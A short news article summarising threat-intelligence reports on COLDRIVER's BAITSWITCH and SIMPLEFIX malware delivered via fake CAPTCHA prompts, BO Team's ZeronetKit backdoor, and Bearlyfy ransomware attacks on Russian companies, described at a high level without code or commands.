- Russian group COLDRIVER uses new Malware BAITSWITCH and SIMPLEFIX in recent attacks.
- Attack methods include tricking users into running malicious files disguised as CAPTCHA prompts.
- Victims include government, nonprofit, and civil society organizations with links to Russia.
- Other groups, including BO Team and Bearlyfy, launched attacks against Russian companies with updated tools and Ransomware.
- Ransom demands in recent attacks ranged from several thousand dollars to $86,000.
A recent cyberattack campaign by the Russian-linked group COLDRIVER, also known as Callisto, Star Blizzard, and UNC4057, targeted a range of organizations with new malware tools. The campaign, identified by Zscaler ThreatLabz in early June, uses a multi-stage method to deploy BAITSWITCH and SIMPLEFIX, described as lightweight downloaders and backdoors.
Researchers reported that BAITSWITCH acts by delivering SIMPLEFIX, a PowerShell-based backdoor. According to Zscaler, “The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced.” The attackers entice users with fake CAPTCHA prompts, which prompt them to run a malicious file. This file connects to an attacker-controlled internet domain to download the SIMPLEFIX malware. The malware sends device information, establishes remote access, and hides its tracks by clearing evidence from system logs.
Further analysis showed that SIMPLEFIX communicates with remote servers to run programs and collect files from targeted devices. The current campaign mimics the group’s previous operations, which typically aim at non-governmental organizations, activists, and others connected to Russian civil society.
In other developments, Cybersecurity firm Kaspersky identified a phishing attack against Russian companies by the group BO Team using password-protected archive files to distribute updated versions of BrockenDoor and a Golang-based backdoor called ZeronetKit. The ZeronetKit malware provides attackers with the ability to remotely control infected systems, transfer files, and run commands. Kaspersky noted the malware is made to ensure persistence on systems by utilizing BrockenDoor.
A separate group named Bearlyfy used ransomware—specifically LockBit 3.0 and Babuk—in a series of attacks on Russian firms, as reported by F6. Ransom amounts varied, with the highest reported demand near $86,000 in cryptocurrency. Bearlyfy reportedly relied on exploiting vulnerabilities in software like Bitrix and leveraged known privilege escalation flaws, which allow attackers to gain increased access to victims’ systems.
Investigation also revealed that Bearlyfy’s attack style differs from known groups. F6 explained, “Bearlyfy…uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. The primary toolkit is aimed at encryption, destruction, or modification of data.” Although some infrastructure used aligns with the suspected pro-Ukrainian group PhantomCore, researchers believe Bearlyfy acts independently.
These attacks highlight ongoing cybersecurity risks faced by various organizations both within and connected to Russia.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- BlackRock Unveils Bitcoin ETF Using Covered Calls for Yield
- Aster DEX Refunds Users After XPL Price Glitch, Token Falls 12%
- New XCSSET macOS Malware Variant Targets Firefox, Steals Crypto
- Amazon to Pay $2.5B in FTC Settlement, 35M Prime Users Refunded
- Trump-Linked DeFi Project WLFI Launches Token Buyback After 41% Drop
